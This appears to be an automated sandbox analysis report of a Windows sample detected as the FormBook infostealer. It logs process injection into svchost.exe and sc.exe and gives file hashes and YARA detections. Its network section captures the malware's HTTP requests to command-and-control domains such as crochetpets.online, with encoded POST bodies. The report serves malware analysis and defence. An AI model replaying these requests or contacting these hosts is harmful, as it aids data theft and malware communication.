                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 6b 33 75 63 55 68 35 6f 61 44 2f 2b 63 76 70 61 4d 6e 79 2b 73 55 57 62 4b 37 51 34 35 5a 7a 59 37 62 55 6b 70 34 58 56 66 79 58 74 67 30 48 31 2b 45 4e 46 41 62 4d 6f 58 33 70 6b 35 62 41 46 54 70 48 33 76 6c 4b 6c 44 6c 6f 41 44 52 73 57 54 55 78 31 58 73 48 48 67 76 38 2b 69 61 48 44 4a 52 5a 63 53 61 79 31 79 42 75 62 6f 6b 4e 38 53 78 45 57 73 62 4e 59 33 65 67 50 4a 71 47 4d 66 68 4d 34 56 37 66 67 50 45 6c 68 65 2f 79 7a 6b 46 75 50 38 44 45 2b 32 6a 72 72 7a 55 30 47 41 51 30 32 34 7a 47 2f 62 41 43 41 46 79 36 49 65 31 48 76 54 71 4a 67 46 4f 55 4f 66 78 70 33 78 76 67 56 6c 50 68 61 48 4a 56 53 71 55 7a 71 64 6d 50 35 46 2b 30 55 6e 46 43 53 2b 46 52 49 41 38 61 43 42 50 71 69 75 33 57 6b 78 30 74 70 76 64 56 4e 71 2b 73 42 57 35 34 69 6e 77 78 6c 47 45 45 2b 74 51 41 64 62 76 38 75 5a 4d 6e 50 36 61 34 4c 79 44 52 4b 36 69 42 71 64 48 5a 6c 70 4f 7a 2b 57 34 32 72 64 33 69 4d 65 6b 45 4b 33 46 75 56 33 4f 61 63 74 68 4a 2b 54 7a 66 48 6d 64 30 70 46 77 67 4d 4f 76 4b 69 46 68 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=k3ucUh5oaD/+cvpaMny+sUWbK7Q45ZzY7bUkp4XVfyXtg0H1+ENFAbMoX3pk5bAFTpH3vlKlDloADRsWTUx1XsHHgv8+iaHDJRZcSay1yBubokN8SxEWsbNY3egPJqGMfhM4V7fgPElhe/yzkFuP8DE+2jrrzU0GAQ024zG/bACAFy6Ie1HvTqJgFOUOfxp3xvgVlPhaHJVSqUzqdmP5F+0UnFCS+FRIA8aCBPqiu3Wkx0tpvdVNq+sBW54inwxlGEE+tQAdbv8uZMnP6a4LyDRK6iBqdHZlpOz+W42rd3iMekEK3FuV3OacthJ+TzfHmd0pFwgMOvKiFhcMMP5cRZLGsXd7jIflCKA17QzzkI0zfoXfzNmD3ru2iT+1yiCETP+XOyV26hncXCg7/d87eLOcwM3MmkTuOUIvo7Cjine0MuFEcPu4+5Rv3W9msRoqRq9kEtB6CLs7HIyf3V+9c1HsP5Efwg9xwzFjlJOEb6En3BuAsg3GBtVJC/uDf7Yl6dL8P6F7UtqOv8jChTiRZX8oyL/fNcYonzxxflZ6mgFtuLWUxQBb6DSqQYYmOviuoV5MY91ER/SRODkmf080AY8N7Bq/Xz50IIPHD6jpooQRe9H9ZD9GSB0tskS1bi+9luWFp4FoUHAqbwFA6/CTWN8bz6A/zVosxGs5BRyiRFbH4NT6N0hAEAfSY7doqeRbALxsFnlI3fKZjQvLUg0z1rC9arPGYKfWTUwTwjnlwwazwIMDwgJZ0/UJkf+C91pVRduuset9vonXcLh+2YMbXRfR3goeAtVymowB4KoH/X9iMNoiMNmPYWpaTPfGZpSg3Pbdp65W7GREeDVDcXqiPPPdri/C8WlDzJhoHmovsuLATbqqEoC8jWp0qD8XKbMMvIU46mmnXw1IKCnrWgdyQwGRcNt2aMYhaCGmLhUIPC4vuboXFzCj9DB6Cms6VgPjgQNoB4F2MdjwqT6Yfy3gVwh2QA3u3v+SJncpI01eOadijof9 [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            52192.168.2.6614443.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:44.104273081 CEST504OUTGET /ow7w/?lLYL=kvUX&5vc=p1G8XVp3dTmrBOooBHOazFGeIrxM1J3oyb4/irL+UWW2iE7BpWwBAaQNTChmqclkWYPZ2V3tJwkqHmUMbW57TcftwINdn5ScJT94TdCNnEqMkWAGcRU1jqFlvrtrVO/HPFIHZdo= HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.takeun.club
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:54:44.559705019 CEST405INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 265
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 4c 59 4c 3d 6b 76 55 58 26 35 76 63 3d 70 31 47 38 58 56 70 33 64 54 6d 72 42 4f 6f 6f 42 48 4f 61 7a 46 47 65 49 72 78 4d 31 4a 33 6f 79 62 34 2f 69 72 4c 2b 55 57 57 32 69 45 37 42 70 57 77 42 41 61 51 4e 54 43 68 6d 71 63 6c 6b 57 59 50 5a 32 56 33 74 4a 77 6b 71 48 6d 55 4d 62 57 35 37 54 63 66 74 77 49 4e 64 6e 35 53 63 4a 54 39 34 54 64 43 4e 6e 45 71 4d 6b 57 41 47 63 52 55 31 6a 71 46 6c 76 72 74 72 56 4f 2f 48 50 46 49 48 5a 64 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lLYL=kvUX&5vc=p1G8XVp3dTmrBOooBHOazFGeIrxM1J3oyb4/irL+UWW2iE7BpWwBAaQNTChmqclkWYPZ2V3tJwkqHmUMbW57TcftwINdn5ScJT94TdCNnEqMkWAGcRU1jqFlvrtrVO/HPFIHZdo="}</script></head></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            53192.168.2.661445208.91.197.27805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:49.921968937 CEST785OUTPOST /8l0y/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.crochetpets.online
                                                                                                                                            Origin: http://www.crochetpets.online
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.crochetpets.online/8l0y/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 74 72 78 62 4e 4e 56 48 35 59 53 61 7a 54 4d 67 32 53 72 2f 51 66 39 51 6a 34 45 76 78 70 6b 75 6e 76 43 63 42 59 42 4f 50 31 31 30 37 66 7a 31 34 43 69 46 43 33 62 73 54 65 6a 48 6f 53 64 57 54 52 72 52 63 36 2b 2b 2b 50 48 63 4e 48 41 73 7a 72 61 33 59 6e 5a 69 35 68 57 55 4a 70 43 76 6e 76 58 6a 4c 6e 6b 64 4f 39 78 4a 77 56 59 72 31 73 33 31 69 66 65 58 6a 4f 6e 78 33 34 59 65 52 2f 35 30 43 54 6c 53 37 63 68 64 7a 4a 6d 35 66 4f 62 53 47 41 46 2b 64 36 6d 6d 63 75 2b 58 36 30 41 4d 51 6d 4b 4f 74 59 65 44 45 30 56 4b 6d 2b 31 4b 69 56 71 64 42 52 34 61 4b 4a 50 50 72 35 59 45 34 43 48 72 33 75 54 76
                                                                                                                                            Data Ascii: 5vc=trxbNNVH5YSazTMg2Sr/Qf9Qj4EvxpkunvCcBYBOP1107fz14CiFC3bsTejHoSdWTRrRc6+++PHcNHAszra3YnZi5hWUJpCvnvXjLnkdO9xJwVYr1s31ifeXjOnx34YeR/50CTlS7chdzJm5fObSGAF+d6mmcu+X60AMQmKOtYeDE0VKm+1KiVqdBR4aKJPPr5YE4CHr3uTv


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            54192.168.2.661446208.91.197.27805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:52.463586092 CEST809OUTPOST /8l0y/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.crochetpets.online
                                                                                                                                            Origin: http://www.crochetpets.online
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.crochetpets.online/8l0y/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 74 72 78 62 4e 4e 56 48 35 59 53 61 7a 7a 38 67 77 7a 72 2f 53 2f 39 54 67 34 45 76 36 4a 6c 47 6e 6f 4b 63 42 5a 31 67 50 6a 4e 30 36 2b 44 31 35 47 2b 46 42 33 62 73 62 2b 6a 47 31 43 64 4e 54 52 6d 6b 63 2f 57 2b 2b 4c 76 63 4e 44 45 73 7a 5a 79 30 5a 33 5a 73 79 42 57 53 55 5a 43 76 6e 76 58 6a 4c 6a 4a 47 4f 39 5a 4a 7a 6d 41 72 79 2b 66 32 72 2f 65 59 6b 4f 6e 78 7a 34 59 61 52 2f 35 4b 43 58 74 6f 37 65 70 64 7a 49 57 35 63 61 50 56 56 67 46 38 51 61 6e 70 64 75 76 41 6b 56 73 4b 66 45 6d 51 71 49 36 2f 42 43 55 51 36 4e 31 70 77 46 4b 66 42 54 67 6f 4b 70 50 6c 70 35 67 45 71 56 4c 4d 34 61 32 4d 47 30 33 75 35 47 68 6a 6f 72 75 77 45 6c 43 46 4d 70 7a 38 78 77 3d 3d
                                                                                                                                            Data Ascii: 5vc=trxbNNVH5YSazz8gwzr/S/9Tg4Ev6JlGnoKcBZ1gPjN06+D15G+FB3bsb+jG1CdNTRmkc/W++LvcNDEszZy0Z3ZsyBWSUZCvnvXjLjJGO9ZJzmAry+f2r/eYkOnxz4YaR/5KCXto7epdzIW5caPVVgF8QanpduvAkVsKfEmQqI6/BCUQ6N1pwFKfBTgoKpPlp5gEqVLM4a2MG03u5GhjoruwElCFMpz8xw==


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            55192.168.2.661447208.91.197.27805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:55.009452105 CEST1822OUTPOST /8l0y/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.crochetpets.online
                                                                                                                                            Origin: http://www.crochetpets.online
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.crochetpets.online/8l0y/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 74 72 78 62 4e 4e 56 48 35 59 53 61 7a 7a 38 67 77 7a 72 2f 53 2f 39 54 67 34 45 76 36 4a 6c 47 6e 6f 4b 63 42 5a 31 67 50 67 74 30 37 49 66 31 34 68 4b 46 41 33 62 73 56 65 6a 39 31 43 63 4e 54 52 76 73 63 2f 61 45 2b 4a 58 63 4e 6d 51 73 37 4e 6d 30 57 33 5a 73 39 68 57 54 4a 70 44 37 6e 76 48 6e 4c 6a 35 47 4f 39 5a 4a 7a 67 73 72 68 4d 33 32 6e 66 65 58 6a 4f 6e 31 33 34 59 79 52 2b 51 79 43 58 68 43 38 75 4a 64 77 6f 47 35 64 76 62 56 50 67 46 79 63 36 6d 32 64 75 69 48 6b 56 78 31 66 45 2b 71 71 4c 6d 2f 44 45 59 4f 68 63 70 57 69 56 47 43 41 43 6b 53 53 5a 36 62 6d 5a 35 36 69 30 54 35 2f 34 43 7a 66 55 7a 78 7a 30 77 2f 2f 71 50 66 4e 68 7a 51 45 72 6a 79 76 51 59 48 47 31 47 66 34 78 39 47 6c 51 59 31 66 71 76 6a 33 76 6b 4c 70 56 78 4f 6b 6c 78 4a 52 78 78 72 4d 4c 5a 5a 50 44 4c 73 44 53 62 6e 32 33 36 51 74 69 76 75 45 34 31 42 43 36 31 74 6d 6f 57 48 6b 70 33 75 71 74 35 7a 52 32 4d 52 36 38 58 75 72 43 51 69 77 6c 42 78 38 30 5a 6c 4c 47 55 4f 6e 49 72 4f 47 4e 42 37 31 45 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=trxbNNVH5YSazz8gwzr/S/9Tg4Ev6JlGnoKcBZ1gPgt07If14hKFA3bsVej91CcNTRvsc/aE+JXcNmQs7Nm0W3Zs9hWTJpD7nvHnLj5GO9ZJzgsrhM32nfeXjOn134YyR+QyCXhC8uJdwoG5dvbVPgFyc6m2duiHkVx1fE+qqLm/DEYOhcpWiVGCACkSSZ6bmZ56i0T5/4CzfUzxz0w//qPfNhzQErjyvQYHG1Gf4x9GlQY1fqvj3vkLpVxOklxJRxxrMLZZPDLsDSbn236QtivuE41BC61tmoWHkp3uqt5zR2MR68XurCQiwlBx80ZlLGUOnIrOGNB71EFucvZ74rOk02AHrQM0TodvY0dRhfIGHrGogjEoHcilPLG94ehd8hWw/q0AvwCfaiMGDqZzHYFQuFp5o/J1ujT1OM0eGHeXqV9R8EEd9ccWK+N54M7GCkGpECakS3rcZbqNdKhTwd4fQyDsYn74g6wNr18JoxhE0VI5NripB/NMGb0kUyuSbUPvfiY83GN/BEHfsCY6aGbvucJPVwJcLqChMdY2aMyzVdiiVy5O1s1tevl9kd+z2RalvIdCi+FSgdiMQzDjWqCAGGJ7OFSRYh6N//rdBwvYqWDv9ZRW8DcsBV4IJKx/4s74LCvBpUcBbLaCbKhuORsqqvmN5VoxNWsnCEFlxVgH8hE9LOpLFBGfvRv1ukxiNOMdybYETiw6rnpxPDhBBGBwAdNvXnBOsuC7XJfL0cZ0DhlP4M9+YkPZhpH00RsPv203qzBJWBCoI01VkXQCRPMjkq4myMAq6y8Rj5195VVTB+kzxpXdDvdM8EKbhSjJxkuVQVymRT47skSPYmOME045H+IsdqNUxKiJUHNA22oTf3ZdyZ7EfJD1YAd3XAsCgfdT58z7Kk3HSGxekN95WakP1Nmhzfg8+4xK/jTCZxebgSDUCucs6eKJ8tGxYgtoHPKdOFqvZzWZczxZsEEcPTZhE2w5EVEtdOyfWOh6v/Ps+HQA [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            56192.168.2.661448208.91.197.27805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:57.557986975 CEST511OUTGET /8l0y/?5vc=gpZ7O9wJuofu6jQ+zhbQfshngqVv9cE5kPyoFYRIcR03yvbe/BOPGk6xXKz30nptSiLZCe/Z5fLwL00E8raoZSt1+2D0KaGk+ev1JjVnWNJk73VZkcb+ifONmJiX1s5MbYZXBXE=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.crochetpets.online
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:54:58.773294926 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:58 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                            Set-Cookie: vsid=903vr476103298182483891; expires=Tue, 09-Oct-2029 10:54:58 GMT; Max-Age=157680000; path=/; domain=www.crochetpets.online; HttpOnly
                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_burJPNSPOl1svUZ0mjPPA32/3gp+1OdJKGOzmuum8S/XCVaFFRymbgTLrs4NlI/+Chb38XReaw3LftRAHixE+A==
                                                                                                                                            Content-Length: 2630
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 62 75 72 4a 50 4e 53 50 4f 6c 31 73 76 55 5a 30 6d 6a 50 50 41 33 32 2f 33 67 70 2b 31 4f 64 4a 4b 47 4f 7a 6d 75 75 6d 38 53 2f 58 43 56 61 46 46 52 79 6d 62 67 54 4c 72 73 34 4e 6c 49 2f 2b 43 68 62 33 38 58 52 65 61 77
                                                                                                                                            Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_burJPNSPOl1svUZ0mjPPA32/3gp+1OdJKGOzmuum8S/XCVaFFRymbgTLrs4NlI/+Chb38XReaw
                                                                                                                                            Oct 10, 2024 12:54:58.773356915 CEST1236INData Raw: 33 4c 66 74 52 41 48 69 78 45 2b 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20
                                                                                                                                            Data Ascii: 3LftRAHixE+A=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.crochetpets.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.crochetpets.online/px.js?ch=2"></sc
                                                                                                                                            Oct 10, 2024 12:54:58.773369074 CEST1151INData Raw: 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61
                                                                                                                                            Data Ascii: <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            57192.168.2.661449156.242.132.8280
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:55:07.414695024 CEST508OUTGET /54aa/?lLYL=kvUX&5vc=YMphRbBqYD1qziPfcxWfV7OUDSA3QU5FUkSnoqDZt26OzjZirNwjAGjBpWvuubqos1AuwzhTz+mW7CpJxDFhVa/HfUjNfzfl4NcBItZkd8PY3xDlIjidjox4juNb6YkC0urLz9Q= HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.shanhaiguan.net
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:06:50:57
                                                                                                                                            Start date:10/10/2024
                                                                                                                                            Path:C:\Users\user\Desktop\foljNJ4bug.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\foljNJ4bug.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'337'889 bytes
                                                                                                                                            MD5 hash:7D4F32D00EC594FD95E2CD5915940BC5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:06:51:01
                                                                                                                                            Start date:10/10/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\foljNJ4bug.exe"
                                                                                                                                            Imagebase:0xa80000
                                                                                                                                            File size:46'504 bytes
                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:06:51:06
                                                                                                                                            Start date:10/10/2024
                                                                                                                                            Path:C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe"
                                                                                                                                            Imagebase:0x340000
                                                                                                                                            File size:140'800 bytes
                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:06:51:08
                                                                                                                                            Start date:10/10/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\SysWOW64\sc.exe"
                                                                                                                                            Imagebase:0x880000
                                                                                                                                            File size:61'440 bytes
                                                                                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:06:51:20
                                                                                                                                            Start date:10/10/2024
                                                                                                                                            Path:C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe"
                                                                                                                                            Imagebase:0x340000
                                                                                                                                            File size:140'800 bytes
                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                            Has elevated privileges:false
